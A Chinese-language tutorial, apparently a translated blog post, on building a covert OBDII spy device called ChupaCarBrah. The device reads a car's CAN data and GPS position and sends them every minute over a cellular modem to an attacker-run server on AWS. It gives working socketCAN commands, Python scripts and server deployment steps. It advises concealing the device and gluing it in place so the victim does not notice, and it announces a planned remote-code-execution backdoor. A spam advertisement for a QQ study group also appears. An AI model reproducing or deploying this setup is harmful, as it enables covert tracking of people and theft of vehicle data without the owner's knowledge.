使用Python进行汽车黑客攻击：泄露GPS和OBDII&CAN总线数据

本文会介绍一种基于Python用于从OBDII端口发送和接收CAN消息的设备，还可以从行驶中的车辆获取实时GPS坐标。所有的CAN和GPS数据都有可能被泄漏到云中，因此可以通过Web浏览器对汽车进行远程监控。这篇文章是关于我在使用开源软件和硬件（python-can / Flask和 BeagleBone®Blue） 进行汽车黑客攻击方面的经验。

很多人学习python，不知道从何学起。
很多人学习python，掌握了基本语法过后，不知道在哪里寻找案例上手。
很多已经做案例的人，却不知道如何去学习更加高深的知识。
那么针对这三类人，我给大家提供一个好的学习平台，免费领取视频教程，电子书籍，以及课程的源代码！
QQ群：101677771

 https://beagleboard.org/blue

ChupaCarBrah间谍装置

我创建了一个单独的 分步教程，介绍如何构建 本文将使用 的间谍设备 aka ChupaCarBrah。我还共享了在设备上运行的python-can客户端的所有代码；以及在AWS上运行的服务器端Flask应用程序。间谍设备的第一个版本能够跟踪车辆位置并监视CAN数据（例如，发动机RPM，空气温度，VIN等）。所有数据都通过添加到Beaglebone的蜂窝LTE调制解调器进行过滤，JSON格式用于将数据发送到AWS上的Flask应用程序。随着车辆的行驶，云中的JSON数据会实时更新，从而使你可以完全远程监控车辆，就可以在家中对汽车进行攻击了。

 https://youtu.be/7DfXmD9MddE

ChupaCarBrah上路了

作为本文的后续，我计划再发布两篇文章以扩展当前的ChupaCarBrah功能：

第2部分— ECU CAN消息：将显示如何篡改直接连接到ECU的CAN总线（因为OBDII通常仅提供诊断数据）。我将集中精力对CAN消息进行逆向，以将精心制作的命令发送到ECU。出于安全原因，我计划仅分析无危害的命令，例如开锁门，打开电动窗等；

第3部分-车辆RCE：我打算扩展ChupaCarBrah应用程序，以更加用户友好的格式显示正在运行中被窃取的所有数据，例如在地图上绘制的GPS数据。具有实时数据的GUI还将显示来自已解码CAN消息的当前车辆信息（速度，RPM等）。我还计划通过POST端点扩展AWS服务，这将允许通过蜂窝网络创建反向HTTP会话，从而将CAN命令提交给车辆。

0x01 威胁建模

通常，汽车制造商采用的威胁模型是通过在CAN总线和外部网络之间建立隔离来减少车辆的攻击面。分隔可以是物理的（空气间隙）或逻辑的（CAN网关/防火墙）。当确实需要连接CAN和外部网络（例如 V2V 或 IVI ）时，网关通过仅沿一种方式转发CAN消息来提供逻辑隔离。

用ChupaCarBrah建模

采用该威胁模型的安全级别将直接取决于，对CAN总线进行物理访问的难度和利用外部连接上的漏洞进入CAN总线的难度。本文的目的是破解它，并以实用的方式展示攻击者可以物理访问车辆并安装ChupaCarbrah时可以采取的措施。间谍设备在隔离的CAN总线和互联网之间建立了桥梁，破坏了制造商的威胁模型。

但是，要使用ChupaCarBrah进行完整的测试，你仍然需要将我在此处显示的内容与其他攻击技术（例如 按键欺骗） 结合起来，才能进入车辆内部。因此，我认为本文暴露的安全风险较低。但是我仍然想让制造商意识到制造商考虑 CAN消息加密解决方案 的重要性，并提醒车主注意无法完全控制车辆的物理通道的情况（例如，代客泊车，洗车，忘记锁门等）。

 https://youtu.be/bo04J5m1si0

ChupaCarBrah安装：不到60秒

一旦进入车内，攻击者就可以快速将ChupaCarBrah连接到OBDII端口，该设备足够小，可以隐藏在仪表板中。所使用的OBDII分离器电缆将在车辆原始连接器的前面提供一个额外的OBDII母连接器。如果攻击者非常狡猾，则可以使用胶水将分离器永久固定在OBDII端口上。这将使受害者最终可以将其他OBDII设备连接到车辆，而不必希望注意到红色的ChupaCarBrah设备。

0x02 汽车黑客概述

有研究者已经很好地分析了使用CAN（ 控制器局域网 ）进行汽车黑客攻击。如果你想更好地了解汽车供应商如何使用CAN总线来控制你的引擎和其他车辆部件，我建议你看一下 Craig Smith的 《 THE CAR HACKER'S HANDBOOK》 。

我也推荐这篇非常好的文章： Jared Reabow的《如何使用CAN总线破解和升级你的汽车》 。它专门针对CAN，并提供了非常有用的提示，例如如何猜测波特率以及如何查找和接入车辆中的CAN总线。

本文结合了两位作者提出的黑客技术。然后，我通过构建一个简单的BeagleBone间谍设备进一步分析，该设备可通过蜂窝网络与移动中的汽车进行远程交互，同时通过GPS跟踪车辆的位置。

0x03 为什么选择BeagleBone Blue？

长话短说：BeagleBone Blue已经支持CAN，包括CAN收发器。

BeagleBone Blue嵌入式CAN收发器

这意味着，你的电路板不需要额外的hat。基本上，你可以使用两条连接线并将BeagleBone的CAN Hi和CAN Lo引脚分别直接连接到汽车OBDII连接器上的6和14引脚。不仅如此，BeagleBone是一台完整的单板计算机，其 最新映像 已经预装了 SocketCan 。

它还具有嵌入式WiFi网卡，可让你使用CAN工具，而无需将计算机物理连接到汽车上。它将使你可以将设备“嵌入”到汽车中，并使其完全脱离计算机运行。

对于长距离连接，可以使用USB LTE调制解调器（将在下一部分中介绍）。

因此，BeagleBone Blue板是汽车黑客的一个很好的选择，特别是当其他流行的工具（例如 CANtact） 在几乎所有美国分销商 处 都售罄时。如果不想使用开源，可以尝试使用诸如 Macchina.cc之类的 商业产品（我自己还没有尝试过，但是由于它也是基于 BeagleBoard的 ，因此我相信这里介绍的大部分内容仍然适用） 。

0x04 编译ChupaCarBrah

你所需的最少零件是 BeagleBone Blue ， JST / SH连接器 和连接线，它们应按如下所示连接：

BeagleBone Blue JST / SH连接器，具有连接到CAN插槽的连接线

确保连接线足够长，以便可以将其正确连接到汽车的OBDII连接器。请记住，如果电线太长，则可能需要扭曲黄色和绿色（CAN Hi和Lo）以接近标准CAN电缆的性能。当然，你始终可以使用真实的 CAN电缆 代替连接线。

BeagleBone Blue已连接到OBDII

这将允许你启动BeagleBone，启动套接字CAN接口以发送和接收CAN消息。这就是开始入侵CAN所需的一切，但是，通过添加一些其他部件，你可以大大提高BeagleBone的能力，以创建完整的ChupaCarBrah间谍设备。我将所有分步说明放在 单独的文章中 来构建你的ChupaCarbrah，这样我就可以保持本文的简洁性，并专注于Python的黑客攻击。

请参阅 ChupaCarBrah-Hackster.io上的BeagleBone和Python 进行 汽车黑客活动， 以获取有关如何创建支持GPS和蜂窝网络的完整间谍设备的完整详细信息。

0x05 发送和接收CAN消息

将BeagleBone连接到OBDII后，按电源按钮启动它，然后通过SSH连接到它。我建议尽可能 使用WiFi 。WIFI传输信息更快，你将在蜂窝数据计划上节省一些钱。你将需要打开点火开关，以便汽车的CAN设备也能“启动”。你可能需要启动引擎，以免损坏汽车的电池。

在使用Python代码之前，请尝试使用socketCAN手动发送和接收一些消息。首先，为can0（可以为零）接口设置波特率并启用它。

 sudo ip link set can0 up type can bitrate 500000
 sudo ifconfig can0 up

大多数汽车在OBDII总线上使用500kpbs，使用candump收听can0接口上的消息

 sudo candump can0

根据你的车辆，你可能已经在总线上看到CAN消息。如果你的公交车很安静，请打开一个新终端，然后使用cansend发送一些消息：

 sudo cansend can0 7DF#0209020000000000

你应该在运行candump的终端上看到该消息及其响应。如果没有，你可能需要检查接线和/或车辆使用的波特率。你刚刚发送的CAN消息将要求车辆的VIN号，并且响应应该类似于以下截图。

用于获取车辆VIN的CAN消息

VIN编号数据显示在最后3位“ 32 43 34”中，可以将其从十六进制解码为ASCII编码为“ 2C4”：

 echo “32 43 34” | xxd -r -p

VIN数据格式如下：

VIN数据格式

如果将ASCII VIN提供给此 在线NHTSA工具 ，则可以解析你的车辆WMI（世界制造商标识符）并检查其准确性。以我为例，“ 2C4”表示我的车是加拿大制造的道奇车。

既然你已经确认可以使用socketCAN向汽车发送和接收来自汽车的CAN消息，则可以使用Python进行编程：

 
 import can
 
 bus = can.interface.Bus(bustype='socketcan', channel='can0', bitrate=500000)
 
 service_int = int("9", 16) pid_int = int("2", 16) msg = can.Message(arbitration_id=0x7DF, data=[2, service_int, pid_int, 0, 0, 0, 0, 0], is_extended_id=False) try: bus.send(msg) response = bus.recv(timeout=2) print(response) except can.CanError: print("CAN error") finally: bus.shutdown()

如果要尝试其他命令，请参考 此表， 并提供可用的可用OBDII PID列表。确保在Python脚本中为变量“ service_int”分配“模式（十六进制）”的整数值，并为变量“ pid_int”分配“ PID（十六进制）”变量的整数值。

例如，如果要读取引擎RPM，请使用以下命令更改脚本的第5行和第6行：

 service_int = int(“1”, 16)
 pid_int = int(“0C”, 16)

你可以 在此处 找到有关 OBDII PID的 更多文档。

0x06 GPS坐标

要获取GPS数据，只需从ChupaCarBrah设备运行“ tio”命令。

 tio / dev / ttyO2 -b 4800

它会显示很多 GPS NMEA信息 ，但是我们只是为了获取地理位置，你只会对GPRMC 信息感兴趣。

来自ChupaCarBrah的GPS数据

你可以通过复制GPRMC 信息（如地理位置解码$ GPRMC，170454.000，A，3500.87097，N，10641.14163，W，0.00,171.40,100520 ,,, A * 79），这个 在线GPRMC工具 ，它将绘制你的在地图上的确切位置。

GPS GPRMC地理位置在地图上绘制。

你可以使用以下Python脚本检索GPS地理位置GPRMC数据：

 import time
 import serial
 
 gps_data = ""
 utf_data = ""
 ser = serial.Serial('/dev/ttyO2', 4800)
 counter = 0
 while utf_data.find("GPRMC") == -1: counter += 1 try: ser_data = ser.readline() utf_data = ser_data.decode() except: utf_data = "" time.sleep(0.5) if counter > 50: break ser.close() if utf_data.find("GPRMC") != -1: utf_data = utf_data.replace('\r', '') utf_data = utf_data.replace('\n', '') gps_data = utf_data print(gps_data)

Python代码可检索GPS地理位置坐标。

0x07 连接到蜂窝网络

我将全息图数据计划与Nova HOL-NOVA-R410蜂窝调制解调器一起使用，但是与BeagleBone兼容的任何其他运营商或蜂窝调制解调器都可以正常工作，只要你能够使用蜂窝数据连接到Internet就行。

Hologram的优点是，它们提供了Python SDK。使用数据计划激活SIM卡并安装SDK之后，即可使用此Python脚本。它允许你通过手机以编程方式连接到Internet，并ping Google以检查连接性。

 import psutil
 import time
 import subprocess
 from Hologram.CustomCloud import CustomCloud
 
 
 def hologram_network_connect(): hologram_network_disconnect() time.sleep(2) cloud = CustomCloud(None, network='cellular') cloud.network.disable_at_sockets_mode() res = cloud.network.connect() message = "" if res: message = "PPP session started" else: message = "Failed to start PPP" print(message) def hologram_network_disconnect(): print('Checking for existing PPP sessions') for proc in psutil.process_iter(): try: pinfo = proc.as_dict(attrs=['pid', 'name']) except: print("Failed to check for existing PPP sessions") if 'pppd' in pinfo['name']: print('Found existing PPP session on pid: %s' % pinfo['pid']) print('Killing pid %s now' % pinfo['pid']) process = psutil.Process(pinfo['pid']) process.terminate() process.wait() hologram_network_connect() time.sleep(2) ping_response = subprocess.Popen(["/bin/ping", "-c1", "-w100", "www.google.com"], stdout=subprocess.PIPE).stdout.read() print(ping_response.decode()) time.sleep(2) hologram_network_disconnect()

Python代码将Hologram蜂窝模式连接到Internet。

请参阅 Hackster.io 上的 ChupaCarBrah教程 ，以获取有关如何安装全息图调制解调器及其SDK的完整详细信息。

0x08 提取数据

首先，你将需要服务器将数据发送到。使用 Github上 可用的Python chupacarbrah_server.py代码，并将其作为服务部署在AWS上。

下面是执行的命令：

 ~$ git clone https://github.com/blupants/chupacarbrah_server.git
 ~$ cd chupacarbrah_server
 ~$ cp chupacarbrah_server.py application.py ~$ source virt/bin/activate (virt) ~$ pip install flask==1.0.2 (virt) ~$ pip freeze > requirements.txt (virt) ~$ deactivate ~$ python3 -m pip install awscli ~$ python3 -m pip install awsebcli ~$ eb init -p python-3.6 flask-chupacarbrah — region us-east-2 ~$ $ eb init Do you want to set up SSH for your instances? (y/n): ySelect a keypair. 1) my-keypair 2) [ Create new KeyPair ] ~$ eb create chupacarbrah-env ~$ eb open

如果你需要进一步的详细说明，请再次参考 Hackster.io 上的 ChupaCarBrah教程 。

服务运行后，记下URL，以便你可以将脚本指向BeagleBone，以在那里发送数据。你可以通过curl发布一些虚拟数据来确认服务已启动并正在运行：

 SERVER_URL= curl — header “Content-Type: application/json” \
 — request POST \
 — data ‘{“car_uuid”:”51f317ec266e4adb956212201f87ba52", “VIN”: “2C4”, “maker”: “Generic”, “log”:{“timestamp”:”20200501120000",”GPS”:”00"}}’ \ “$SERVER_URL/api/v1/cars” curl “$SERVER_URL/api/v1/status”

在AWS上从ChupaCarBrah服务发布和获取虚拟数据

确认AWS服务正常运行后，用SSH到BeagleBone并从 Github 克隆chupacarbrah。编辑 chupacarbrah.py 脚本，并使用上一步中的AWS服务URL 设置server_url变量。

 git clone  cd chupacarbrah
 sudo python3 chupacarbrah.py

运行后，ChupaCarBrah客户端将使用 simple.csv 上启用的所有CAN命令，并将它们发送到CAN总线。响应将显示在标准输出上，并发送到/ tmp / chupacarbrah / log文件。每隔1分钟，它还会作为JSON发送到AWS服务。

要停止它，请打开一个新终端（ssh会话）并运行：

 sudo touch /tmp/stop

为了启用/禁用更多 OBDII PID命令 ，你可以通过在“启用”列上将要启用的所有命令设置为1，将要禁用的 命令设置为0 ，来编辑文件 obd2_std_PIDs_enabled.csv 。在启用其他命令之前，请确保你了解这些命令的功能，并知道自己在做什么。你刚刚克隆到BeagleBone的chupacarbrah github存储库上都提供了simple.csv和obd2_std_PIDs_enabled.csv文件。

打开网络浏览器，并监视每分钟更新的JSON数据以及车辆的所有泄漏信息。

来自AWS上ChupaCarBrah服务的样本JSON虚拟数据

你可能需要刷新浏览器上的页面以更新显示的数据。由于它使用JSON格式，因此非常便于创建前端来使用它和/或将其与其他应用程序集成。

至此，本系列的第一部分已经完成，一共是3篇文章。请继续关注下一部分，我将介绍ECU CAN消息并为ChupaCarBrah添加更多功能。最终目标是在车辆中创建一个完整的后门，并支持远程代码执行。